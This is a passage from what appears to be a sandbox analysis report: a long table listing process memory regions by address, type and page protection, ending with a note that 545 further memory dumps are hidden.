page read and write
|
||
|
24DBB293000
|
heap
|
page read and write
|
||
|
7FFB226E2000
|
unkown
|
page readonly
|
||
|
B73BC79000
|
stack
|
page read and write
|
||
|
25B83F55000
|
trusted library allocation
|
page read and write
|
||
|
B73B07E000
|
unkown
|
page readonly
|
||
|
1F880D09000
|
heap
|
page read and write
|
||
|
248E6A50000
|
trusted library allocation
|
page read and write
|
||
|
1F882B90000
|
trusted library allocation
|
page read and write
|
||
|
2C3E000
|
trusted library allocation
|
page read and write
|
||
|
5FE4000
|
heap
|
page read and write
|
||
|
2B60000
|
trusted library allocation
|
page read and write
|
||
|
248E6920000
|
trusted library allocation
|
page read and write
|
||
|
B73C37E000
|
unkown
|
page readonly
|
||
|
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
|
248E1C15000
|
heap
|
page read and write
|
||
|
1F882D0A000
|
trusted library allocation
|
page read and write
|
||
|
2C56000
|
trusted library allocation
|
page read and write
|
||
|
24DB921A000
|
heap
|
page read and write
|
||
|
1F88319B000
|
trusted library allocation
|
page read and write
|
||
|
24DBB2EE000
|
heap
|
page read and write
|
||
|
24DB91B5000
|
heap
|
page read and write
|
||
|
1F882C17000
|
trusted library allocation
|
page read and write
|
||
|
6000000
|
heap
|
page read and write
|
||
|
7FFAACE90000
|
trusted library allocation
|
page read and write
|
||
|
25B83CEB000
|
trusted library allocation
|
page read and write
|
||
|
94B133C000
|
stack
|
page read and write
|
||
|
24DB924E000
|
heap
|
page read and write
|
||
|
B73ADFE000
|
stack
|
page read and write
|
||
|
24DB9470000
|
heap
|
page read and write
|
||
|
24DBB2F6000
|
heap
|
page read and write
|
||
|
248E1D1A000
|
heap
|
page read and write
|
||
|
EC0000
|
heap
|
page read and write
|
||
|
F96000
|
heap
|
page read and write
|
||
|
24DB91DF000
|
heap
|
page read and write
|
||
|
24DBB202000
|
heap
|
page read and write
|
||
|
7FFAACEA0000
|
trusted library allocation
|
page read and write
|
||
|
8ECB9FE000
|
stack
|
page read and write
|
||
|
8ECBFFE000
|
stack
|
page read and write
|
||
|
2C4E000
|
trusted library allocation
|
page read and write
|
||
|
24DBB251000
|
heap
|
page read and write
|
||
|
25B863F9000
|
trusted library allocation
|
page read and write
|
||
|
11A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
24DBB1AC000
|
heap
|
page read and write
|
||
|
2E82000
|
trusted library allocation
|
page read and write
|
||
|
B73A47E000
|
stack
|
page read and write
|
||
|
248E69C0000
|
trusted library allocation
|
page read and write
|
||
|
1F883040000
|
trusted library allocation
|
page read and write
|
||
|
1F89AC49000
|
heap
|
page read and write
|
||
|
248E1BC0000
|
trusted library section
|
page readonly
|
||
|
7FFAACE70000
|
trusted library allocation
|
page read and write
|
||
|
248E6AF1000
|
heap
|
page read and write
|
||
|
24DB9475000
|
heap
|
page read and write
|
||
|
2E90000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACEC0000
|
trusted library allocation
|
page read and write
|
||
|
8ECB526000
|
stack
|
page read and write
|
||
|
24DB9080000
|
heap
|
page read and write
|
||
|
248E6934000
|
trusted library allocation
|
page read and write
|
||
|
248E1D00000
|
heap
|
page read and write
|
||
|
1F880C60000
|
heap
|
page read and write
|
||
|
25B803D9000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE10000
|
trusted library allocation
|
page read and write
|
||
|
24DB924E000
|
heap
|
page read and write
|
||
|
94B11BE000
|
stack
|
page read and write
|
||
|
248E1BD0000
|
trusted library section
|
page readonly
|
||
|
24DB924E000
|
heap
|
page read and write
|
||
|
94B1178000
|
stack
|
page read and write
|
||
|
B73A67C000
|
stack
|
page read and write
|
||
|
FD3000
|
heap
|
page read and write
|
||
|
24DBAC21000
|
heap
|
page read and write
|
||
|
24DBB1E3000
|
heap
|
page read and write
|
||
|
F8B000
|
heap
|
page read and write
|
||
|
E90000
|
heap
|
page read and write
|
||
|
24DBAC20000
|
heap
|
page read and write
|
||
|
24DB91D8000
|
heap
|
page read and write
|
||
|
248E6C90000
|
remote allocation
|
page read and write
|
||
|
94B12B9000
|
stack
|
page read and write
|
||
|
531E000
|
stack
|
page read and write
|
||
|
1F89ACA5000
|
heap
|
page read and write
|
||
|
8F5153000
|
stack
|
page read and write
|
||
|
1F89AE30000
|
heap
|
page read and write
|
||
|
24DB91C9000
|
heap
|
page read and write
|
||
|
1F883061000
|
trusted library allocation
|
page read and write
|
||
|
1F882BE0000
|
heap
|
page read and write
|
||
|
1F882720000
|
heap
|
page read and write
|
||
|
24DB9150000
|
heap
|
page read and write
|
||
|
EA6000
|
heap
|
page read and write
|
||
|
94B14BE000
|
stack
|
page read and write
|
||
|
7FFB226D6000
|
unkown
|
page readonly
|
||
|
B73AFFE000
|
stack
|
page read and write
|
||
|
1190000
|
trusted library allocation
|
page read and write
|
||
|
B73AE7E000
|
unkown
|
page readonly
|
||
|
248E6A57000
|
heap
|
page read and write
|
||
|
7FFAACC60000
|
trusted library allocation
|
page read and write
|
||
|
7DF41C450000
|
trusted library allocation
|
page execute and read and write
|
||
|
24DBAC2A000
|
heap
|
page read and write
|
||
|
2C4A000
|
trusted library allocation
|
page read and write
|
||
|
248E6949000
|
trusted library allocation
|
page read and write
|
||
|
248E68E0000
|
trusted library allocation
|
page read and write
|
||
|
1F880CD7000
|
heap
|
page read and write
|
||
|
24DB9187000
|
heap
|
page read and write
|
||
|
248E68F0000
|
trusted library allocation
|
page read and write
|
||
|
248E6C90000
|
remote allocation
|
page read and write
|
||
|
24DB91BA000
|
heap
|
page read and write
|
||
|
248E68D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBB2000
|
trusted library allocation
|
page read and write
|
||
|
43E000
|
remote allocation
|
page execute and read and write
|
||
|
1F882C0F000
|
trusted library allocation
|
page read and write
|
||
|
25B803E1000
|
trusted library allocation
|
page read and write
|
||
|
2AA0000
|
trusted library allocation
|
page read and write
|
||
|
24DB91B7000
|
heap
|
page read and write
|
||
|
24DBB222000
|
heap
|
page read and write
|
||
|
24DBB2EE000
|
heap
|
page read and write
|
||
|
248E6A1F000
|
heap
|
page read and write
|
||
|
2C5D000
|
trusted library allocation
|
page read and write
|
||
|
94B1238000
|
stack
|
page read and write
|
||
|
7FFAACD50000
|
trusted library allocation
|
page read and write
|
||
|
1F880D29000
|
heap
|
page read and write
|
||
|
52DE000
|
stack
|
page read and write
|
||
|
B73B97E000
|
unkown
|
page readonly
|
||
|
24DB9191000
|
heap
|
page read and write
|
||
|
2A8B000
|
trusted library allocation
|
page execute and read and write
|
||
|
25B80223000
|
trusted library allocation
|
page read and write
|
||
|
8F57BE000
|
unkown
|
page read and write
|
||
|
24DB91C9000
|
heap
|
page read and write
|
||
|
248E6870000
|
trusted library allocation
|
page read and write
|
||
|
25B821E1000
|
trusted library allocation
|
page read and write
|
||
|
DB0000
|
heap
|
page read and write
|
||
|
24DBB244000
|
heap
|
page read and write
|
||
|
7FFAACE80000
|
trusted library allocation
|
page read and write
|
||
|
103F000
|
heap
|
page read and write
|
||
|
94B200D000
|
stack
|
page read and write
|
||
|
6EC41000
|
unkown
|
page execute read
|
||
|
24DB91FA000
|
heap
|
page read and write
|
||
|
24DB91CE000
|
heap
|
page read and write
|
||
|
1F89AC4B000
|
heap
|
page read and write
|
||
|
5FE0000
|
heap
|
page read and write
|
||
|
1F880D0B000
|
heap
|
page read and write
|
||
|
24DB9186000
|
heap
|
page read and write
|
||
|
24DBAE00000
|
heap
|
page read and write
|
||
|
248E1370000
|
trusted library allocation
|
page read and write
|
||
|
94B0E7E000
|
stack
|
page read and write
|
||
|
248E6B0A000
|
heap
|
page read and write
|
||
|
2E60000
|
trusted library allocation
|
page read and write
|
||
|
1F88315C000
|
trusted library allocation
|
page read and write
|
||
|
1F89ACBA000
|
heap
|
page read and write
|
||
|
7FFAACD61000
|
trusted library allocation
|
page read and write
|
||
|
24DB920A000
|
heap
|
page read and write
|
||
|
248E6A1F000
|
heap
|
page read and write
|
||
|
248E1BA0000
|
trusted library section
|
page readonly
|
||
|
248E6A4C000
|
heap
|
page read and write
|
||
|
8ECB8FE000
|
stack
|
page read and write
|
||
|
24DB917B000
|
heap
|
page read and write
|
||
|
6045000
|
heap
|
page read and write
|
||
|
24DBB2EE000
|
heap
|
page read and write
|
||
|
24DB91D7000
|
heap
|
page read and write
|
||
|
2A87000
|
trusted library allocation
|
page execute and read and write
|
||
|
94B15BB000
|
stack
|
page read and write
|
||
|
25B85D58000
|
trusted library allocation
|
page read and write
|
||
|
11AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
24DBAC2A000
|
heap
|
page read and write
|
||
|
B73BD7E000
|
unkown
|
page readonly
|
||
|
25B84958000
|
trusted library allocation
|
page read and write
|
||
|
6EC40000
|
unkown
|
page readonly
|
||
|
94B107E000
|
stack
|
page read and write
|
||
|
8F56FE000
|
stack
|
page read and write
|
||
|
B73B37E000
|
unkown
|
page readonly
|
||
|
248E6C30000
|
trusted library allocation
|
page read and write
|
||
|
B73B57E000
|
unkown
|
page readonly
|
||
|
1F8831F5000
|
trusted library allocation
|
page read and write
|
||
|
248E6B00000
|
heap
|
page read and write
|
||
|
B73B87E000
|
stack
|
page read and write
|
||
|
248E147A000
|
heap
|
page read and write
|
||
|
5280000
|
heap
|
page read and write
|
||
|
1F881040000
|
heap
|
page read and write
|
||
|
6018000
|
heap
|
page read and write
|
||
|
24DB91C2000
|
heap
|
page read and write
|
||
|
24DB924E000
|
heap
|
page read and write
|
||
|
1F8832FA000
|
trusted library allocation
|
page read and write
|
||
|
24DB91B5000
|
heap
|
page read and write
|
||
|
3DA9000
|
trusted library allocation
|
page read and write
|
||
|
2B2C000
|
stack
|
page read and write
|
||
|
2E68000
|
trusted library allocation
|
page read and write
|
||
|
25B85358000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC66000
|
trusted library allocation
|
page read and write
|
||
|
24DB924E000
|
heap
|
page read and write
|
||
|
248E6C20000
|
trusted library allocation
|
page read and write
|
||
|
24DB91BF000
|
heap
|
page read and write
|
||
|
25B83CF5000
|
trusted library allocation
|
page read and write
|
||
|
25B835E1000
|
trusted library allocation
|
page read and write
|
||
|
3DED000
|
trusted library allocation
|
page read and write
|
||
|
24DBB250000
|
heap
|
page read and write
|
||
|
24DB91C8000
|
heap
|
page read and write
|
||
|
248E1BB0000
|
trusted library section
|
page readonly
|
||
|
B73AF7E000
|
unkown
|
page readonly
|
||
|
1F880CCF000
|
heap
|
page read and write
|
||
|
24DB91A9000
|
heap
|
page read and write
|
||
|
248E6AD2000
|
heap
|
page read and write
|
||
|
94B0FFE000
|
stack
|
page read and write
|
||
|
2E4E000
|
trusted library allocation
|
page read and write
|
||
|
1F880C40000
|
heap
|
page read and write
|
||
|
248E1502000
|
heap
|
page read and write
|
||
|
248E6AC0000
|
heap
|
page read and write
|
||
|
25B8007B000
|
trusted library allocation
|
page read and write
|
||
|
2A70000
|
trusted library allocation
|
page read and write
|
||
|
24DB924E000
|
heap
|
page read and write
|
||
|
2B30000
|
trusted library allocation
|
page execute and read and write
|
||
|
8F583F000
|
stack
|
page read and write
|
||
|
1F892BF1000
|
trusted library allocation
|
page read and write
|
||
|
24DB924E000
|
heap
|
page read and write
|
||
|
24DBAC23000
|
heap
|
page read and write
|
||
|
25B817E1000
|
trusted library allocation
|
page read and write
|
||
|
1037000
|
heap
|
page read and write
|
||
|
24DB9478000
|
heap
|
page read and write
|
||
|
1F89AD90000
|
heap
|
page execute and read and write
|
||
|
1F882680000
|
trusted library allocation
|
page read and write
|
||
|
C5A000
|
stack
|
page read and write
|
||
|
1F880D56000
|
heap
|
page read and write
|
||
|
8F5BBF000
|
stack
|
page read and write
|
||
|
94B0F7D000
|
stack
|
page read and write
|
||
|
7FFAACD92000
|
trusted library allocation
|
page read and write
|
||
|
248E6ABE000
|
heap
|
page read and write
|
||
|
24DB9181000
|
heap
|
page read and write
|
||
|
1F89AD33000
|
heap
|
page read and write
|
||
|
6003000
|
heap
|
page read and write
|
||
|
24DB924E000
|
heap
|
page read and write
|
||
|
248E1340000
|
heap
|
page read and write
|
||
|
1F880CC0000
|
heap
|
page read and write
|
||
|
1F880D9B000
|
heap
|
page read and write
|
||
|
1F89AC46000
|
heap
|
page read and write
|
||
|
24DB91CD000
|
heap
|
page read and write
|
||
|
1F882728000
|
heap
|
page read and write
|
||
|
B73A277000
|
stack
|
page read and write
|
||
|
7FFAACED0000
|
trusted library allocation
|
page read and write
|
||
|
248E1D1A000
|
heap
|
page read and write
|
||
|
B73A77E000
|
unkown
|
page readonly
|
||
|
8F55FC000
|
stack
|
page read and write
|
||
|
24DB9206000
|
heap
|
page read and write
|
||
|
24DB9230000
|
heap
|
page read and write
|
||
|
24DB91B5000
|
heap
|
page read and write
|
||
|
1F882D10000
|
trusted library allocation
|
page read and write
|
||
|
1F89AD26000
|
heap
|
page read and write
|
||
|
24DB924E000
|
heap
|
page read and write
|
||
|
2A80000
|
trusted library allocation
|
page read and write
|
||
|
24DBB151000
|
heap
|
page read and write
|
||
|
248E1380000
|
trusted library section
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
248E14A1000
|
heap
|
page read and write
|
||
|
5920000
|
trusted library allocation
|
page read and write
|
||
|
24DBB2EE000
|
heap
|
page read and write
|
||
|
11B6000
|
heap
|
page read and write
|
||
|
7FFAACD80000
|
trusted library allocation
|
page execute and read and write
|
||
|
248E6930000
|
trusted library allocation
|
page read and write
|
||
|
2B98000
|
trusted library allocation
|
page read and write
|
||
|
7FFB226C1000
|
unkown
|
page execute read
|
||
|
8F547E000
|
stack
|
page read and write
|
||
|
7FFAACE50000
|
trusted library allocation
|
page read and write
|
||
|
8F51DE000
|
stack
|
page read and write
|
||
|
2DB5000
|
trusted library allocation
|
page read and write
|
||
|
248E14FF000
|
heap
|
page read and write
|
||
|
24DB91CD000
|
heap
|
page read and write
|
||
|
248E6A4F000
|
heap
|
page read and write
|
||
|
1F882FFD000
|
trusted library allocation
|
page read and write
|
||
|
25B863FC000
|
trusted library allocation
|
page read and write
|
||
|
6450000
|
trusted library allocation
|
page read and write
|
||
|
248E1D5A000
|
heap
|
page read and write
|
||
|
24DB91BF000
|
heap
|
page read and write
|
||
|
248E147D000
|
heap
|
page read and write
|
||
|
1F882D1B000
|
trusted library allocation
|
page read and write
|
||
|
94B1F8E000
|
stack
|
page read and write
|
||
|
248E6A60000
|
heap
|
page read and write
|
||
|
248E6AE3000
|
heap
|
page read and write
|
||
|
24DB91FA000
|
heap
|
page read and write
|
||
|
248E6C40000
|
trusted library allocation
|
page read and write
|
||
|
7FFB226C0000
|
unkown
|
page readonly
|
||
|
25B803DD000
|
trusted library allocation
|
page read and write
|
||
|
1F8831A8000
|
trusted library allocation
|
page read and write
|
||
|
1F89AC40000
|
heap
|
page read and write
|
||
|
B73B3FE000
|
stack
|
page read and write
|
||
|
B73BB7E000
|
unkown
|
page readonly
|
||
|
248E2841000
|
trusted library allocation
|
page read and write
|
||
|
24DBB26B000
|
heap
|
page read and write
|
||
|
248E1F91000
|
trusted library allocation
|
page read and write
|
||
|
24DB924E000
|
heap
|
page read and write
|
||
|
24DB91FC000
|
heap
|
page read and write
|
||
|
2C3B000
|
trusted library allocation
|
page read and write
|
||
|
1F882C3F000
|
trusted library allocation
|
page read and write
|
||
|
25B860E9000
|
trusted library allocation
|
page read and write
|
||
|
248E68F1000
|
trusted library allocation
|
page read and write
|
||
|
2B50000
|
trusted library allocation
|
page read and write
|
||
|
11A0000
|
trusted library allocation
|
page read and write
|
||
|
24DB9248000
|
heap
|
page read and write
|
||
|
B73B47E000
|
unkown
|
page readonly
|
||
|
2A6D000
|
trusted library allocation
|
page execute and read and write
|
||
|
248E6920000
|
trusted library allocation
|
page read and write
|
||
|
24DB91EF000
|
heap
|
page read and write
|
||
|
F68000
|
heap
|
page read and write
|
||
|
248E1D13000
|
heap
|
page read and write
|
||
|
B73A87C000
|
stack
|
page read and write
|
||
|
7FFAACC96000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F883173000
|
trusted library allocation
|
page read and write
|
||
|
6EC56000
|
unkown
|
page readonly
|
||
|
94B0BEE000
|
stack
|
page read and write
|
||
|
1F880CA0000
|
heap
|
page read and write
|
||
|
94B0B62000
|
stack
|
page read and write
|
||
|
248E1C00000
|
heap
|
page read and write
|
||
|
1F880D0F000
|
heap
|
page read and write
|
||
|
7FFAACE40000
|
trusted library allocation
|
page read and write
|
||
|
3D81000
|
trusted library allocation
|
page read and write
|
||
|
6440000
|
trusted library allocation
|
page read and write
|
||
|
1F882C62000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACE20000
|
trusted library allocation
|
page read and write
|
||
|
B73B2FE000
|
stack
|
page read and write
|
||
|
B73BA7D000
|
stack
|
page read and write
|
||
|
526E000
|
stack
|
page read and write
|
||
|
5380000
|
heap
|
page read and write
|
||
|
24DB91D1000
|
heap
|
page read and write
|
||
|
248E1D02000
|
heap
|
page read and write
|
||
|
8F577F000
|
stack
|
page read and write
|
||
|
94B153E000
|
stack
|
page read and write
|
||
|
58DD000
|
stack
|
page read and write
|
||
|
7FFB226E5000
|
unkown
|
page readonly
|
||
|
24DB9181000
|
heap
|
page read and write
|
||
|
B73B27E000
|
unkown
|
page readonly
|
||
|
24DB91FA000
|
heap
|
page read and write
|
||
|
7FFAACE30000
|
trusted library allocation
|
page read and write
|
||
|
248E6A00000
|
heap
|
page read and write
|
||
|
248E6A2C000
|
heap
|
page read and write
|
||
|
24DB91B5000
|
heap
|
page read and write
|
||
|
7FFAACBC0000
|
trusted library allocation
|
page read and write
|
||
|
5290000
|
heap
|
page execute and read and write
|
||
|
2A7A000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F882D0D000
|
trusted library allocation
|
page read and write
|
||
|
1F882D1E000
|
trusted library allocation
|
page read and write
|
||
|
B73AA7C000
|
stack
|
page read and write
|
||
|
7FFAACDE0000
|
trusted library allocation
|
page read and write
|
||
|
248E2420000
|
trusted library allocation
|
page read and write
|
||
|
248E14B9000
|
heap
|
page read and write
|
||
|
2AEE000
|
stack
|
page read and write
|
||
|
1F882726000
|
heap
|
page read and write
|
||
|
2E96000
|
trusted library allocation
|
page read and write
|
||
|
11A4000
|
trusted library allocation
|
page read and write
|
||
|
6420000
|
trusted library allocation
|
page read and write
|
||
|
587F000
|
stack
|
page read and write
|
||
|
1F880D51000
|
heap
|
page read and write
|
||
|
248E148F000
|
heap
|
page read and write
|
||
|
4E7D000
|
stack
|
page read and write
|
||
|
2D7F000
|
stack
|
page read and write
|
||
|
2C51000
|
trusted library allocation
|
page read and write
|
||
|
8ECBCFF000
|
stack
|
page read and write
|
||
|
520C000
|
stack
|
page read and write
|
||
|
F60000
|
heap
|
page read and write
|
||
|
1F880DB6000
|
heap
|
page read and write
|
||
|
248E6930000
|
trusted library allocation
|
page read and write
|
||
|
248E7000000
|
heap
|
page read and write
|
||
|
B73B1FE000
|
stack
|
page read and write
|
||
|
6750000
|
heap
|
page read and write
|
||
|
7FFB226C1000
|
unkown
|
page execute read
|
||
|
B73AC7B000
|
stack
|
page read and write
|
||
|
24DB91FA000
|
heap
|
page read and write
|
||
|
248E1413000
|
heap
|
page read and write
|
||
|
577E000
|
stack
|
page read and write
|
||
|
1F880C30000
|
heap
|
page read and write
|
||
|
8ECBEFE000
|
stack
|
page read and write
|
||
|
24DB9090000
|
heap
|
page read and write
|
||
|
25B86DFC000
|
trusted library allocation
|
page read and write
|
||
|
25B860FE000
|
trusted library allocation
|
page read and write
|
||
|
24DB924E000
|
heap
|
page read and write
|
||
|
248E69C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB226E0000
|
unkown
|
page read and write
|
||
|
8ECC0FF000
|
stack
|
page read and write
|
||
|
248E1310000
|
heap
|
page read and write
|
||
|
6EC5D000
|
unkown
|
page read and write
|
||
|
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
|
24DB923C000
|
heap
|
page read and write
|
||
|
1F882D61000
|
trusted library allocation
|
page read and write
|
||
|
248E6AF4000
|
heap
|
page read and write
|
||
|
B73B77E000
|
unkown
|
page readonly
|
||
|
2C30000
|
trusted library allocation
|
page read and write
|
||
|
1F882660000
|
trusted library allocation
|
page read and write
|
||
|
1160000
|
heap
|
page read and write
|
||
|
5373000
|
heap
|
page read and write
|
||
|
248E6A8D000
|
heap
|
page read and write
|
||
|
24DB947A000
|
heap
|
page read and write
|
||
|
5370000
|
heap
|
page read and write
|
||
|
24DBAC21000
|
heap
|
page read and write
|
||
|
24DB91CE000
|
heap
|
page read and write
|
||
|
B73C2FE000
|
stack
|
page read and write
|
||
|
248E14A3000
|
heap
|
page read and write
|
||
|
248E1440000
|
heap
|
page read and write
|
||
|
7FFB226E5000
|
unkown
|
page readonly
|
||
|
24DB91C9000
|
heap
|
page read and write
|
||
|
B73B4FE000
|
stack
|
page read and write
|
||
|
FF5000
|
heap
|
page read and write
|
||
|
1F88301D000
|
trusted library allocation
|
page read and write
|
||
|
1F882690000
|
heap
|
page execute and read and write
|
||
|
248E6A14000
|
heap
|
page read and write
|
||
|
2A60000
|
trusted library allocation
|
page read and write
|
||
|
24DB91FA000
|
heap
|
page read and write
|
||
|
94B10FE000
|
stack
|
page read and write
|
||
|
248E2240000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD6A000
|
trusted library allocation
|
page read and write
|
||
|
24DB91E8000
|
heap
|
page read and write
|
||
|
24DBB165000
|
heap
|
page read and write
|
||
|
1F880D11000
|
heap
|
page read and write
|
||
|
248E1BE0000
|
trusted library section
|
page readonly
|
||
|
8F5C3B000
|
stack
|
page read and write
|
||
|
248E6A42000
|
heap
|
page read and write
|
||
|
6460000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B40000
|
trusted library allocation
|
page read and write
|
||
|
25B80DE1000
|
trusted library allocation
|
page read and write
|
||
|
24DBAC36000
|
heap
|
page read and write
|
||
|
2C70000
|
heap
|
page read and write
|
||
|
24DB91EC000
|
heap
|
page read and write
|
||
|
24DB91DA000
|
heap
|
page read and write
|
||
|
1F89B170000
|
heap
|
page read and write
|
||
|
248E6B02000
|
heap
|
page read and write
|
||
|
25B80001000
|
trusted library allocation
|
page read and write
|
||
|
24DB947B000
|
heap
|
page read and write
|
||
|
1F882D21000
|
trusted library allocation
|
page read and write
|
||
|
25B83D99000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
248E6910000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24DB90B0000
|
heap
|
page read and write
|
||
|
7FFAACC70000
|
trusted library allocation
|
page execute and read and write
|
||
|
24DB9186000
|
heap
|
page read and write
|
||
|
2E48000
|
trusted library allocation
|
page read and write
|
||
|
EA0000
|
heap
|
page read and write
|
||
|
7FFAACDF0000
|
trusted library allocation
|
page read and write
|
||
|
248E6A40000
|
trusted library allocation
|
page read and write
|
||
|
24DB9186000
|
heap
|
page read and write
|
||
|
24DB91E3000
|
heap
|
page read and write
|
||
|
1F89AD2D000
|
heap
|
page read and write
|
||
|
B739C9B000
|
stack
|
page read and write
|
||
|
1F882BF1000
|
trusted library allocation
|
page read and write
|
||
|
591E000
|
stack
|
page read and write
|
||
|
24DBB2BE000
|
heap
|
page read and write
|
||
|
8F5ABE000
|
stack
|
page read and write
|
||
|
7FFAACEB0000
|
trusted library allocation
|
page read and write
|
||
|
5360000
|
trusted library allocation
|
page read and write
|
||
|
248E1474000
|
heap
|
page read and write
|
||
|
24DB9248000
|
heap
|
page read and write
|
||
|
24DBB30B000
|
heap
|
page read and write
|
||
|
631E000
|
stack
|
page read and write
|
||
|
248E2860000
|
trusted library allocation
|
page read and write
|
||
|
248E6AF8000
|
heap
|
page read and write
|
||
|
25B83F58000
|
trusted library allocation
|
page read and write
|
||
|
8F567E000
|
stack
|
page read and write
|
||
|
7FFAACCD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F89AD97000
|
heap
|
page execute and read and write
|
||
|
24DBB193000
|
heap
|
page read and write
|
||
|
248E1B90000
|
trusted library section
|
page readonly
|
||
|
248E1400000
|
heap
|
page read and write
|
||
|
1F89AF20000
|
heap
|
page read and write
|
||
|
24DBB1C6000
|
heap
|
page read and write
|
||
|
B73AB7E000
|
unkown
|
page readonly
|
There are 545 hidden memdumps, click here to show them.